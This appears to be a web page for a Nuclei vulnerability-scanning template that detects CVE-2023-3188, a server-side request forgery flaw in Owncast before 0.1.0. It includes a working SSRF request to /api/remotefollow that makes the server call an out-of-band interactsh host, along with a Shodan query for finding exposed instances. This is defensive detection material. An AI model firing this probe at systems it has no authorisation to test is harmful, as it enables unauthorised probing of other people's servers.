Owncast - Server Side Request Forgery

ID: CVE-2023-3188

Severity: medium

Author: DhiyaneshDk

Tags: cve,cve2023,owncast,oast,ssrf

Description

Server-Side Request Forgery (SSRF) in GitHub repository owncast/owncast prior to 0.1.0.

YAML Source

id: CVE-2023-3188

info:
  name: Owncast - Server Side Request Forgery
  author: DhiyaneshDk
  severity: medium
  description: |
    Server-Side Request Forgery (SSRF) in GitHub repository owncast/owncast prior to 0.1.0.
  reference:
    - https://owncast.online/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3188
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-3188
    cwe-id: CWE-918
    epss-score: 0.00098
    epss-percentile: 0.41558
    cpe: cpe:2.3:a:owncast_project:owncast:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: owncast_project
    product: owncast
    shodan-query: html:"owncast"
  tags: cve,cve2023,owncast,oast,ssrf

http:
  - raw:
      - |
        POST /api/remotefollow HTTP/1.1
        Host: {{Hostname}}

        {"account":"a@{{interactsh-url}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"

      - type: word
        part: body
        words:
          - 'success":'
          - 'message":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"
# digest: 490a00463044022062162605046e5a9a7bd063d9ff9a66b967cdfde0ec64a9e3a1071616cecdd860022069215cd7e9fec38be913662aa7735df8147a2672e58db600a73ab367af5eae06:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-3188.yaml"

View on Github